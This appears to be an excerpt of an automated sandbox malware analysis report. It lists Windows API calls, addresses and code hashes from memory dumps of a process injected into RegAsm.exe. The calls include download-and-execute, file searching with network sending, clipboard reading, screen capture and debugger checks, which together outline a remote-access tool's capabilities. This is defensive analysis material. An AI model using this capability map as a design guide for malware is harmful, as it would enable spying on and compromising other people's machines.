                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Find$File$CloseFirstH_prologNext
                                                                                • String ID:
                                                                                • API String ID: 1157919129-0
                                                                                • Opcode ID: 0a4f7936ce2960db9bf45ce6e7c064902b20e644c01fdc90b969e8a4ba3c73a8
                                                                                • Instruction ID: 8e52766585a78a9bd0f7e398a9017c7fe376444e683812dd136b20495b515571
                                                                                • Opcode Fuzzy Hash: 0a4f7936ce2960db9bf45ce6e7c064902b20e644c01fdc90b969e8a4ba3c73a8
                                                                                • Instruction Fuzzy Hash: 7F814C328001099BCB15EBA2DC969EDB378AF14318F10417FE506B71E2EF789E49CB58
                                                                                APIs
                                                                                • __EH_prolog.LIBCMT ref: 0040884C
                                                                                • FindFirstFileW.KERNEL32(00000000,?,00466618,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00408905
                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 0040892D
                                                                                • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040893A
                                                                                • FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00408A50
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Find$File$CloseException@8FirstH_prologNextThrow
                                                                                • String ID:
                                                                                • API String ID: 1771804793-0
                                                                                • Opcode ID: 5adf80dd010b7e34ca961d25f929f8e7600ba30a6adf491365bde7e26c19110d
                                                                                • Instruction ID: 0d5560aa06bbfb8d15084ed76e809f646cede1ce68103026aeaac9ba950e1e68
                                                                                • Opcode Fuzzy Hash: 5adf80dd010b7e34ca961d25f929f8e7600ba30a6adf491365bde7e26c19110d
                                                                                • Instruction Fuzzy Hash: 9D517F72900209AACB04FB65DD569ED7778AF10308F50417FB906B71E2EF389B49CB89
                                                                                APIs
                                                                                • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00406FF7
                                                                                • URLDownloadToFileW.URLMON(00000000,00000000,00000004,00000000,00000000), ref: 004070DB
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: DownloadExecuteFileShell
                                                                                • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$open
                                                                                • API String ID: 2825088817-3056885514
                                                                                • Opcode ID: c0d078bf0315f94293dc3ec17d1a86d1ef83da94f9faf21a2cb0fd5468fc728f
                                                                                • Instruction ID: 89f65c5a2840bfed21b3c91f130df949caec66636536da5e2ea9f2eef63816fc
                                                                                • Opcode Fuzzy Hash: c0d078bf0315f94293dc3ec17d1a86d1ef83da94f9faf21a2cb0fd5468fc728f
                                                                                • Instruction Fuzzy Hash: 5261B371A0830166CA14FB76C8569BE37A59F81758F40093FB9427B2D3EE3C9905C69B
                                                                                APIs
                                                                                • FindFirstFileW.KERNEL32(00000000,?,?,?,00000000), ref: 00407892
                                                                                • FindNextFileW.KERNEL32(00000000,?,?,?,00000000), ref: 0040795A
                                                                                  • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: FileFind$FirstNextsend
                                                                                • String ID: XPG$XPG
                                                                                • API String ID: 4113138495-1962359302
                                                                                • Opcode ID: 7dbd6f8b18a356aa144966577a14d72b83863f0c29c9cdf64239cb3f20770996
                                                                                • Instruction ID: fedc3c23448d2be437c2d68ef58725aa3c97e5c0e74d328490a6b39f64eed896
                                                                                • Opcode Fuzzy Hash: 7dbd6f8b18a356aa144966577a14d72b83863f0c29c9cdf64239cb3f20770996
                                                                                • Instruction Fuzzy Hash: 2D21A4315083015BC714FB61D895CEFB3ACAF90358F40493EF696620E1FF78AA098A5B
                                                                                APIs
                                                                                  • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                                                  • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                                                  • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                                                  • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                                                • EnumSystemLocalesW.KERNEL32(00452143,00000001,00000000,?,JD,?,00452770,00000000,?,?,?), ref: 0045208D
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                                                • String ID: p'E$JD
                                                                                • API String ID: 1084509184-908320845
                                                                                • Opcode ID: 475d6d5c58d7186cd22417851423cdf86cfe6bc0717def2965f4a7021c27fb53
                                                                                • Instruction ID: b0e9e6415e7ea3a3ed95e939ef0edb9d062384d4a1a0bde9f31cc9ceae225fa6
                                                                                • Opcode Fuzzy Hash: 475d6d5c58d7186cd22417851423cdf86cfe6bc0717def2965f4a7021c27fb53
                                                                                • Instruction Fuzzy Hash: 0211553A2007019FDB189F39C9916BBBB92FF8075AB14482EEE4687B41D7B5A946C740
                                                                                APIs
                                                                                  • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                                                  • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                                                  • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                                                  • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                                                  • Part of subcall function 00448295: _free.LIBCMT ref: 004482F4
                                                                                  • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 00448301
                                                                                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00452197
                                                                                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004521E8
                                                                                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004522A8
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ErrorInfoLastLocale$_free$_abort
                                                                                • String ID:
                                                                                • API String ID: 2829624132-0
                                                                                • Opcode ID: 1ce7e7c7dfcd5f502045176aa51a1e3ace1f8c45826c3dbb4c0c9878229dab74
                                                                                • Instruction ID: 283aa9570716a6929da4b93cb0bca45b8c77d553a5ebfd19e37a994bad1de6ac
                                                                                • Opcode Fuzzy Hash: 1ce7e7c7dfcd5f502045176aa51a1e3ace1f8c45826c3dbb4c0c9878229dab74
                                                                                • Instruction Fuzzy Hash: F361A235500207ABDF289F24CE82B7A77A8EF05306F1441BBED05C6656E7BC9D89CB58
                                                                                APIs
                                                                                • IsDebuggerPresent.KERNEL32 ref: 0043BC69
                                                                                • SetUnhandledExceptionFilter.KERNEL32 ref: 0043BC73
                                                                                • UnhandledExceptionFilter.KERNEL32(?), ref: 0043BC80
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                • String ID:
                                                                                • API String ID: 3906539128-0
                                                                                • Opcode ID: 1e0b73e88f7870ac8a7e49df57248e9339733cda2bb7518ac33a0b9eb889d704
                                                                                • Instruction ID: 25e88f5a56b9fbea854716c485460a06fbe33a825339a9765be54c88dd7cea35
                                                                                • Opcode Fuzzy Hash: 1e0b73e88f7870ac8a7e49df57248e9339733cda2bb7518ac33a0b9eb889d704
                                                                                • Instruction Fuzzy Hash: 0431D374901218ABCB21DF65D9887CDBBB8EF0C311F5051EAE81CA7251EB749F818F48
                                                                                APIs
                                                                                • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 100061DA
                                                                                • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 100061E4
                                                                                • UnhandledExceptionFilter.KERNEL32(?), ref: 100061F1
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1042274200.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1042264096.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                • Associated: 0000000E.00000002.1042274200.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_10000000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                • String ID:
                                                                                • API String ID: 3906539128-0
                                                                                • Opcode ID: 9058010cd15fc66324dfcb9f974f53c8d28613eb360f6b8a0023823f9da020d8
                                                                                • Instruction ID: da4494ed88e82f72bec2981ffd8ad716d5acf317cb547f21db02b9c2842d332f
                                                                                • Opcode Fuzzy Hash: 9058010cd15fc66324dfcb9f974f53c8d28613eb360f6b8a0023823f9da020d8
                                                                                • Instruction Fuzzy Hash: 4A31D37490122C9BEB21DF24DD88B8DBBB8EF08350F5041DAE81CA7265E7709F818F55
                                                                                APIs
                                                                                • GetCurrentProcess.KERNEL32(?,?,0044332B,?), ref: 00443376
                                                                                • TerminateProcess.KERNEL32(00000000,?,0044332B,?), ref: 0044337D
                                                                                • ExitProcess.KERNEL32 ref: 0044338F
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Process$CurrentExitTerminate
                                                                                • String ID:
                                                                                • API String ID: 1703294689-0
                                                                                • Opcode ID: 4e3b9aa1e9039f050651c305726e439f17232b6e89e74059b12d513dd76054c6
                                                                                • Instruction ID: 4b22f3a5ffe79ca7dfb81d814e561f82a31e4bef9a776fe0bb9daccb8e878f4b
                                                                                • Opcode Fuzzy Hash: 4e3b9aa1e9039f050651c305726e439f17232b6e89e74059b12d513dd76054c6
                                                                                • Instruction Fuzzy Hash: 9FE0B635401608FBDF11AF55DE09A5D3BAAEB40B56F005469FC498A272CF79EE42CB88
                                                                                APIs
                                                                                • GetCurrentProcess.KERNEL32(?,?,10004A8A,?,10012238,0000000C,10004BBD,00000000,00000000,00000001,10002082,10012108,0000000C,10001F3A,?), ref: 10004AD5
                                                                                • TerminateProcess.KERNEL32(00000000,?,10004A8A,?,10012238,0000000C,10004BBD,00000000,00000000,00000001,10002082,10012108,0000000C,10001F3A,?), ref: 10004ADC
                                                                                • ExitProcess.KERNEL32 ref: 10004AEE
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1042274200.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1042264096.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                • Associated: 0000000E.00000002.1042274200.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_10000000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: Process$CurrentExitTerminate
                                                                                • String ID:
                                                                                • API String ID: 1703294689-0
                                                                                • Opcode ID: 0083298fcdf57ae02ee63dbac9b2f40de16c14eb6cad1f3ac06a4de9001c4c8a
                                                                                • Instruction ID: 67c7ca3480f18a9b01e05da0926f82de4ad888d39fdd55e1be860e0f4a97641b
                                                                                • Opcode Fuzzy Hash: 0083298fcdf57ae02ee63dbac9b2f40de16c14eb6cad1f3ac06a4de9001c4c8a
                                                                                • Instruction Fuzzy Hash: 04E04676000218AFEF01BF25CD48B493B6AEF013C1F128010F9088B029CB35ED52CA68
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Clipboard$CloseDataOpen
                                                                                • String ID:
                                                                                • API String ID: 2058664381-0
                                                                                • Opcode ID: ee7560bd864c47a473b03ccd03fab4bf0c670c3a92a751b3696d255e79ff2f15
                                                                                • Instruction ID: 1c65eecdd0087a0ffd0b0a04a5b63b9ff0c479b34dfa65f2e767e94bdce73387
                                                                                • Opcode Fuzzy Hash: ee7560bd864c47a473b03ccd03fab4bf0c670c3a92a751b3696d255e79ff2f15
                                                                                • Instruction Fuzzy Hash: 45E0EC31745320EFC3206B609C49F9B6AA4DF85B52F05443AB905BB2E5DB78CC4086AD
                                                                                APIs
                                                                                • OpenProcess.KERNEL32(00000800,00000000,00000000,?,?,0041605F,00000000), ref: 0041BBD1
                                                                                • NtResumeProcess.NTDLL(00000000), ref: 0041BBDE
                                                                                • CloseHandle.KERNEL32(00000000), ref: 0041BBE7
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Process$CloseHandleOpenResume
                                                                                • String ID:
                                                                                • API String ID: 3614150671-0
APIs
• OpenProcess.KERNEL32(00000800,00000000,00000000,?,?,0041603A,00000000), ref: 0041BBA5
• NtSuspendProcess.NTDLL(00000000), ref: 0041BBB2
• CloseHandle.KERNEL32(00000000), ref: 0041BBBB
Memory Dump Source
• Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
Similarity
• API ID: Process$CloseHandleOpenSuspend
• String ID:
• API String ID: 1999457699-0
APIs
• IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00434CCF
Memory Dump Source
• Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
Similarity
• API ID: FeaturePresentProcessor
• String ID: MZ@
• API String ID: 2325560087-2978689999
Memory Dump Source
• Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
Similarity
• API ID:
• String ID: .
• API String ID: 0-248832578
Memory Dump Source
• Source File: 0000000E.00000002.1042274200.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 0000000E.00000002.1042264096.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 0000000E.00000002.1042274200.0000000010016000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_10000000_RegAsm.jbxd
Similarity
• API ID:
• String ID: .
• API String ID: 0-248832578
APIs
  • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
  • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
  • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
  • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
• EnumSystemLocalesW.KERNEL32(00452393,00000001,?,?,JD,?,00452734,JD,?,?,?,?,?,00444AED,?,?), ref: 00452102
Memory Dump Source
• Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
Similarity
• API ID: ErrorLast$EnumLocalesSystem_abort_free
• String ID: JD
• API String ID: 1084509184-2669065882
APIs
• GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,?,?,00000004), ref: 004489C0
Memory Dump Source
• Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
Similarity
• API ID: InfoLocale
• String ID: GetLocaleInfoEx
• API String ID: 2299586839-2904428671
APIs
  • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
  • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
  • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
  • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
• IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00444AF4,?,?,?,?,?,?,00000004), ref: 00451E3A
• GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,00444AF4,00000000,00444C14), ref: 00451F7B
Memory Dump Source
• Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
Similarity
• API ID: ErrorLast$CodeInfoLocalePageValid_abort_free
• String ID:
• API String ID: 1661935332-0
APIs
  • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
  • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
  • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
  • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
  • Part of subcall function 00448295: _free.LIBCMT ref: 004482F4
  • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 00448301
• GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004523E7
Memory Dump Source
• Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
Similarity
• API ID: ErrorLast$_free$InfoLocale_abort
• String ID:
• API String ID: 1663032902-0
APIs
  • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
  • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
  • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
  • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
• GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,00452361,00000000,00000000,?), ref: 004525EF
Memory Dump Source
• Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
Similarity
• API ID: ErrorLast$InfoLocale_abort_free
• String ID:
• API String ID: 2692324296-0
APIs
  • Part of subcall function 00445909: EnterCriticalSection.KERNEL32(-0006D41D,?,0044305C,00000000,0046E938,0000000C,00443017,?,?,?,00445BA7,?,?,0044834A,00000001,00000364), ref: 00445918
• EnumSystemLocalesW.KERNEL32(0044843E,00000001,0046EAE0,0000000C), ref: 004484BC
Memory Dump Source
• Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
Similarity
• API ID: CriticalEnterEnumLocalesSectionSystem
• String ID:
• API String ID: 1272433827-0
APIs
  • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
  • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
  • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
  • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
• EnumSystemLocalesW.KERNEL32(00451F27,00000001,?,?,?,00452792,JD,?,?,?,?,?,00444AED,?,?,?), ref: 00452007
Memory Dump Source
• Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
Similarity
• API ID: ErrorLast$EnumLocalesSystem_abort_free
• String ID:
• API String ID: 1084509184-0
                                                                                APIs
                                                                                • GetLocaleInfoA.KERNEL32(00000800,0000005A,00000000,00000003,?,?,?,00415537,00474EE0,00475A00,00474EE0,00000000,00474EE0,00000000,00474EE0,5.1.1 Pro), ref: 0040F920
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: InfoLocale
                                                                                • String ID:
                                                                                • API String ID: 2299586839-0
                                                                                APIs
                                                                                • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00418ECB
                                                                                • CreateCompatibleDC.GDI32(00000000), ref: 00418ED8
                                                                                  • Part of subcall function 00419360: EnumDisplaySettingsW.USER32(?,000000FF,?), ref: 00419390
                                                                                • CreateCompatibleBitmap.GDI32(00000000,?), ref: 00418F4E
                                                                                • DeleteDC.GDI32(00000000), ref: 00418F65
                                                                                • DeleteDC.GDI32(00000000), ref: 00418F68
                                                                                • DeleteObject.GDI32(00000000), ref: 00418F6B
                                                                                • SelectObject.GDI32(00000000,00000000), ref: 00418F8C
                                                                                • DeleteDC.GDI32(00000000), ref: 00418F9D
                                                                                • DeleteDC.GDI32(00000000), ref: 00418FA0
                                                                                • StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,?,?,?,00CC0020), ref: 00418FC4
                                                                                • GetCursorInfo.USER32(?), ref: 00418FE2
                                                                                • GetIconInfo.USER32 ref: 00418FF8
                                                                                • DeleteObject.GDI32(?), ref: 00419027
                                                                                • DeleteObject.GDI32(?), ref: 00419034
                                                                                • DrawIcon.USER32(00000000,?,?,?), ref: 00419041
                                                                                • BitBlt.GDI32(00000000,00000000,00000000,?,?,?,00000000,00000000,00660046), ref: 00419077
                                                                                • GetObjectA.GDI32(00000000,00000018,?), ref: 004190A3
